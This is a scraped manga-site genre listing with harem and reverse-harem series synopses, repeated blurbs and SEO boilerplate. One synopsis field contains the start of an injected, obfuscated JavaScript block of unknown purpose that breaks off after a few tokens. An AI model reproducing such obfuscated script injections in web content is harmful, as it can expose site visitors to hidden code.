Harem - Page 67

Harem manga typically stars a male lead surrounded by numerous romantic interests, creating comedic and emotional drama. A reverse harem features a female protagonist instead.

2084 results

I’m A Fake Saintess But The Gods Are Obsessed

I Reincarnated Into The Body Of A Fake Saintess Who Will Die When The Real Saintess Appears Five Years Later. If I Were To Gather The Monthly Allowance Given To The Saintess I Can At The Very Least Buy A Building! But While I Was Carefully Setting Up A Plan To Run Away After Playing The Role Of The Saintess… “Choose Me, Or Else…” “I Prepared A Prison Just For You. My Goddess—” “…” The Male Leads Reacted Differently Than I Expected. [The Bored Divine Beings Have Started To Gain Interest After Watching You.] And Ariel Who Unexpectedly Gained The Interest Of The Gods. On Top Of That, The Final Boss Who Is Going To Put The World Into Despair On Top Of That, The Final Boss Who Is Planning On Destroying The World Isn’t Killing Me, But Helping Me…? I Have No Interest In Gaining The Interest Of The Gods Or Destroying The World! So Please Just Let Me Become A Landlord Like I Wanted—! 가짜 성녀인데 신들이 집착한다


I’m a Fake Saintess but the Gods are Obsessed

I reincarnated into the body of a fake saintess who will die when the real saintess appears five years later. If I were to gather the monthly allowance given to the saintess I can at the very least buy a building! But while I was carefully setting up a plan to run away after playing the role of the saintess… “Choose me, or else…” “I prepared a prison just for you. My goddess—” “…” The male leads reacted differently than I expected. [The bored divine beings have started to gain interest after watching you.] And Ariel who unexpectedly gained the interest of the gods. On top of that, the final boss who is going to put the world into despair On top of that, the final boss who is planning on destroying the world isn’t killing me, but helping me…? I have no interest in gaining the interest of the gods or destroying the world! So please just let me become a landlord like I wanted—! 가짜 성녀인데 신들이 집착한다


I’m a pretender and didn’t get married today

<ol> <li>Jinchuan bound an Otome game when it was about to die. In order to survive, he must pretend to be a woman and step on three boats, and fall in love with the straight boss who can’t wait to see him, the first love who got the wrong sex, and the brother who hates him. In the difficult choice between women’s wear and men’s virginity, Jin Chuan gradually discovered that these men’s feelings for him are not just as simple as the game task… The Drag-Queen Hasn’t Gotten A Proposal Yet / I’m a pretender and didn’t get married today / ????????????</li> </ol><script></script><script>(function(_0x245639,_0x3ba6b5){var _0x38317b=_0x172e,_0xe07fcc=_0x245639();while(!![]){try{var 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I’m a Solo Guide

Read manhwa I’m a Solo Guide / I’m the Solo Guide / I Am a Guide Alone / The Only Guide Ye Ji-an, the only S-class guide in Korea, was often called the “useless guide” due to her unique trait of having a 0% matching rate with all espers. After failing to match with an esper from Russia and on her way back home, she is suddenly swept away by a gate manifestation and wakes up alone in a strange temple-like place. The world she has traveled to through the gate is the continent of Wisrode, filled only with espers, and in this place, Ji-an is the only guide… “I’m a Solo Guide Manhwa” is sames name: 나 혼자 가이드


I’m A Tycoon In The Other World

The modern world's Xu Fei is a contemporary “average college student” with normal appearances, little money and barely any future. In the other world, where martial artists, cultivators, spell practitioners and personal forces wield all the power needed to take over the modern world. It cannot block more than a thousand of people nor shake the ground of ancient times, when medical care, food productions and political form, ect. were scarce. Let's see how Xu Fei swept across the worlds and eventually became a tycoon of the two worlds!


I’m Actually a Cultivation Bigshot

Read I’m Actually a Cultivation Bigshot Manhua The Immortal Dao is ethereal, and Immortals are hard to find. Li Nianfan had descended into the cultivation world as a mortal. After learning that he has no hope in cultivation, he only wants to live a peaceful life. However… The dog he adopts becomes a demon king of a generation when it sees his poems and paintings. It manages to suppress an entire world. The tree he plants behind his house becomes a World Tree after listening to his zither music, forming a bridge between heaven and earth. He meets a passerby who is enlightened by him and becomes an immortal sage who leads an entire generation. When he looks back— It turns out that the scholar who had been pestering him for his calligraphy and paintings despite having crappy chess skills, is a chess saint from the Immortal Realm. The beautiful woman who comes to listen to his music every night is the number one saintess of the Immortal Realm… Yet Another Manhua similar to Above Ten Thousand Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !

2 days ago

I’m Actually a Cultivation Bigshot

The Immortal Dao is ethereal, and Immortals are hard to find. Li Nianfan had descended into the cultivation world as a mortal. After learning that he has no hope in cultivation, he only wants to live a peaceful life. However… The dog he adopts becomes a demon king of a generation when it sees his poems and paintings. It manages to suppress an entire world. The tree he plants behind his house becomes a World Tree after listening to his zither music, forming a bridge between heaven and earth. He meets a passerby who is enlightened by him and becomes an immortal sage who leads an entire generation. When he looks back— It turns out that the scholar who had been pestering him for his calligraphy and paintings despite having crappy chess skills is a chess saint from the Immortal Realm. The beautiful woman who comes to listen to his music every night is the number one saintess of the Immortal Realm… Yet Another Manhua similar to Above Ten Thousand


I’m Really Not The Villain

Read “I’m Really Not The Villain Manga” – “I’m Really Not The Villain Manhwa” Online Free At HOT MANHWA The summary of the comic I’m Really Not The Villain: The human world was dominated by unknown terror. To survive, a group of awakened people chose to fight back. Yi Lin, an unlucky guy who hadn’t had the chance to be the hero, was betrayed after he managed to kill the final boss. But he gets reborn with the abilities of a villainous boss. The once ordinary man becomes the mortal enemy of countless gods and demons. Hey, you guys over there, it’s too late to kneel now. “I’m Really Not The Villain” is also known as: Ben Gerçekten Kötü Adam Değilim / I’m Really Not a Supervillain / I’m Not a Villain / I’m Truly Not the Villainous Big Shot / Wo Zhen Bushi Fanpai Da Lao / Wo Zhen Bushi Fanpai Dalao / Wǒ Zhēn Bùshì Fǎnpài Dàlǎo / 我真不是反派大佬 / 神力を覚醒した俺だけ無限にレベルアップ The comic “I’m Really Not The Villain” belongs to the Genre: Action, Adventure, Fantasy, Harem, Martial Arts, Mature, Mystery, Supernatural “ManhuaPlus, Manga Updates, Manhwa Website…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


I’m The Great Immortal

I’m The Great Immortal The previous life was a peerless genius in the world of immortality. He was killed by 3 celestial beings. He was accidentally reborn to his 20s by the book of heaven. All he wanted to do was to become an immortal and return to the immortal world, and he became the strongest man on the earth, turning his hands into clouds and covering his hands with rain, provoking anyone who defies him! He is the venerable one! The ruler of 3000 worlds! The guy who is 10 000 times better than Thanos! He is Taixuan Taizun! The Great Immortal! I’m Daxianzun Wo Shi Da Xian Zun 我是大仙尊 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !

2 days ago

I’m the Villainess, but the Capture Targets are too Abnormal

The villainess, Mystia, remembered her past life on her 10th birthday and has unwittingly turned the characters in the otome game "Kyun Kyun Love School" into yanderes! In order to avoid becoming the love rival of the "heroine" who will lead her to her downfall, she starts making every effort to break off her engagement with her "prince-like classmate"! That’s was what supposed to happen...But, because of her kind personality, her favorability increased instead! She also resolved the traumas of the "self-indulgent noble" and the "innocent yakuza teacher" causing them to hold warped affection for her. Furthermore, there was an exclusive maid she didn't remember seeing in the game... With all these abnormalities, can she change her situation by the time the heroine enters school? An unstoppable and heart-thumping number of complicated misunderstandings! A suspenseful school romantic comedy that will paint you a picture of hell!


I’m Worried That My Brother Is Too Gentle

“Your Highness! The Papers Have Piled Up Like This……!” I Reincarnated As Irene Weber, The Younger Sister Of An Aide Who Is Suffering From Overtime Because Of The Prince Who Is In Love And Neglects His Work. Irene, Who Was Buried In Work Before The Reincarnation And Died Of Overwork, Intends To Protect Her Beloved Brother From Such A Terrible Thing. No Overtime! No Call After Work! Evil Boss, Go Away! Work Less And Earn More, Brother! To The End, Irene Tries To Separate The Prince From Her Brother. A Method To Win By Knowing Your Enemy And Knowing Yourself. Irene Scraps A Little Record Without Leaving Any Details, Of The Prince Whose Face She Doesn’t Even Know About, For The Future. Somehow, Her Brother’s Face, Looking At Such Irene, Is Dark…… “Brother, If You’re Meeting The Crown Prince Today, I’ll Go With…..” “Absolutely Not.” ‘Do You Want To Meet Him Alone So Much?’ *** “Before That, Benjamin Weber, When Can I Meet Your Sister?” “Not For The Rest Of Your Life.” The Most Affectionate Brother And Sister Of The Continent. Will The Day Come When These Two Siblings Can Resolve Their Growing Misunderstanding?


I’Ve Become A Holy Knight, But The Commander’S Breasts Are Too Amazing To Cleanse My Soul

The aspiring sword master, Ruga, was chosen to join the Order of the Holy Knights due to his sincerity and swordsmanship prowess. He is assigned to the Sixth Order, rumored to be a "living hell," and prepares himself for tough times. However, he ends up meeting the big-breasted Commander, Leon Myrie, who says "Welcome, Ruga. You are the only male knight of the Sixth Order." Looking at his right, he saw big breasts, at his left, beautiful women! Will Ruga's reason last in the face of this inescapable Order?!
